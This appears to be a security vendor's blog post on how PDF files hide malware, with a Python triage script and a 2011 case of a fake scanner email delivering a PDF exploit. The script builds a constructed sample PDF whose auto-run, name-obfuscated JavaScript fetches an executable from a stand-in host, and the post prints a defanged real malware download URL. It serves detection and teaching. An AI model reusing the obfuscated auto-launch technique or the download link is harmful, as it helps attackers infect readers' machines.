How PDF Files Hide Malware & Malicious Code

Chances are that your business uses Adobe Reader (now branded Acrobat Reader) every day to open Portable Document Format (PDF) files; it remains the most widely used program for handling PDFs. Unfortunately, Adobe Reader has a long history of vulnerabilities that are actively exploited in the wild. Once a reader bug is exploited, the attacker's payload runs with whatever privileges the reader process has, normally those of the logged-in user; on an unpatched or unsandboxed reader that is enough to download and install malware on the PC, and if the user is a local administrator the whole machine is compromised.

For this reason, it’s important to understand how to analyze PDF files so that PDF malware does not infiltrate your enterprise. Let’s go over what to look out for, and then walk through a real-life example of PDF malware.

How Are PDFs Infected with Malware & Malicious Code?

A PDF is more than a page description: besides static elements such as text and images, the format can carry dynamic elements such as forms, embedded files, multimedia and JavaScript, and sometimes digital signatures. These features exist to make documents rich and consistent across viewers, but each of them is also a hook that attackers abuse, and the malicious parts are routinely hidden inside compressed streams or behind obfuscated names. Things to look out for include:

  • Multimedia content (RichMedia, Flash, embedded files) can hide risky code
  • Hyperlinks (URI actions) can lead to phishing pages or malware downloads
  • JavaScript can be harmful, especially when it runs automatically through an OpenAction or an additional-action (AA) trigger
  • Launch actions can run programs or system commands on the host and wreak havoc
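The list above is exactly what static PDF triage tools grep for, but a plain string search is not enough: malicious PDFs hide the relevant dictionaries inside FlateDecode object streams and write names with `#xx` hex escapes (`/Java#53cript` for `/JavaScript`). The following script is an added example written for this page, not a tool from the original article or from Cyren: it inflates every compressed stream, undoes the name escaping, counts the suspicious keys and extracts any embedded URLs (the kind of download link a payload is fetched from, as in the 2011 case below). The list of keys to watch is this example's own choice, and the sample PDF it scans is constructed inline and is not a real exploit; the URL in it uses the reserved `example.invalid` domain.

```python
import re
import zlib

# Dictionary keys worth a closer look. Which keys to watch is this example's own choice:
# /JS and /JavaScript carry script, /OpenAction and /AA fire actions automatically (on
# open, or on events such as a page being viewed), /Launch runs an external program or
# command, /URI is a hyperlink, /EmbeddedFile and /RichMedia carry attachments or media,
# and /ObjStm is a compressed stream that can hide any of the others.
SUSPICIOUS_KEYS = (
    "/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch", "/URI",
    "/EmbeddedFile", "/RichMedia", "/ObjStm",
)


def normalize_names(data: bytes) -> bytes:
    """Undo the #xx hex escaping PDF allows inside names (/Java#53cript -> /JavaScript),
    which malware uses to slip past tools that grep for the plain key."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the contents of every stream that inflates as zlib/FlateDecode, so keys
    buried inside compressed object streams are seen as well. Other streams are skipped."""
    out = []
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.DOTALL):
        d = zlib.decompressobj()  # tolerates the end-of-line bytes before 'endstream'
        try:
            out.append(d.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-encoded, or deliberately corrupted
    return b"\n".join(out)


def scan_pdf(data: bytes) -> dict:
    """Count suspicious keys in the raw file plus its inflated streams, and pull out URLs."""
    visible = normalize_names(data)
    hidden = normalize_names(inflate_streams(data))
    counts = {}
    for key in SUSPICIOUS_KEYS:
        # the key must end where the name ends, so /JS does not also match /JSX
        pat = re.escape(key.encode()) + rb"(?![A-Za-z0-9])"
        n = len(re.findall(pat, visible)) + len(re.findall(pat, hidden))
        if n:
            counts[key] = n
    urls = {u.decode("latin-1")
            for u in re.findall(rb"https?://[^\s()<>'\x22]+", visible + hidden)}
    return {"keys": counts, "urls": sorted(urls)}


def verdict(report: dict) -> str:
    """Rough triage: script or a launch that fires automatically is the exploit-PDF pattern."""
    keys = report["keys"]
    auto = "/OpenAction" in keys or "/AA" in keys
    active = any(k in keys for k in ("/JS", "/JavaScript", "/Launch"))
    if auto and active:
        return "high"
    if active or "/EmbeddedFile" in keys or "/RichMedia" in keys or report["urls"]:
        return "medium"
    return "low"


def build_sample_pdf() -> bytes:
    """Constructed sample for this example, not a real malicious file: the catalog's
    /OpenAction points at object 4, which sits inside a FlateDecode object stream and uses
    #-escaped names (/Java#53cript, /J#53) so a plain grep for /JavaScript finds nothing."""
    action = b'4 0\n<< /S /Java#53cript /J#53 (app.launchURL("http://example.invalid/uss05.exe")) >>'
    packed = zlib.compress(action)
    return b"".join([
        b"%PDF-1.5\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n",
        b"5 0 obj\n<< /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length %d >>\n"
        % len(packed),
        b"stream\n", packed, b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    report = scan_pdf(build_sample_pdf())
    print(report, verdict(report))
```

Run against the constructed sample, a raw search of the file sees only `/OpenAction` and `/ObjStm`; the `/JavaScript`, `/JS` and the download URL appear only after the object stream is inflated and the names normalized, which is why the verdict comes back "high". Keep in mind that this is triage, not a verdict on the exploit itself: a high count of these keys in a form-heavy business document can be legitimate, and a PDF that abuses a parser bug in font or image handling may contain none of them, so suspicious files should still go to a sandbox or a full parser such as pdf-parser or peepdf.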

Real-Life PDF Malware Example

While PDF malware attacks have been on the rise for years, the example below dates from 2011. Here is the story:

It’s early morning and I usually start my day by checking and reading emails from a few mailboxes. In one of my mailboxes, I came across a strange new message about a scanned document. As a security specialist, I was immediately suspicious and decided to investigate further. The email is shown below:

The body of the email says that the PDF attachment comes from a “Xerox WorkCentre Pro”, a very popular copier machine widely used in offices. We assume that this type of email and the “innocent” looking PDF attachment would convince most office recipients to open the attachment and thus install new malware on their systems. Commtouch’s Command Antivirus detects this malicious PDF as PDF/Expl.IQ. Recipients who actually open the file will see nothing – there is no text or image content displayed.

The red boxes highlight the vulnerabilities that this PDF attempts to exploit to crash vulnerable PDF reader applications:

All of these exploits have been patched in the latest versions of Acrobat Reader. More information about these known vulnerabilities and affected PDF applications can be found at the above links. For example, “Exploit causes multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allowing remote attackers to execute arbitrary code”.

Once the vulnerable PDF reader application is successfully exploited, a new piece of malware is fetched from the following link: hxxp://open{BLOCKED}stralia.com.au/flash/uss05.exe. This new malware is then installed on the affected system, further exposing the system to other attacks. Command Antivirus detects this file as W32/SuspPack.DA.gen!Eldorado.

The lesson to be learned is that PDF reader software should always be kept up to date (and make sure you have an effective, up-to-date antivirus). As we always say, prevention is better than disinfection.

Final Thoughts

To get further up to speed on everything related to Malware in PDFs, discover Cyren’s malware protection services, or download our report on all things malware.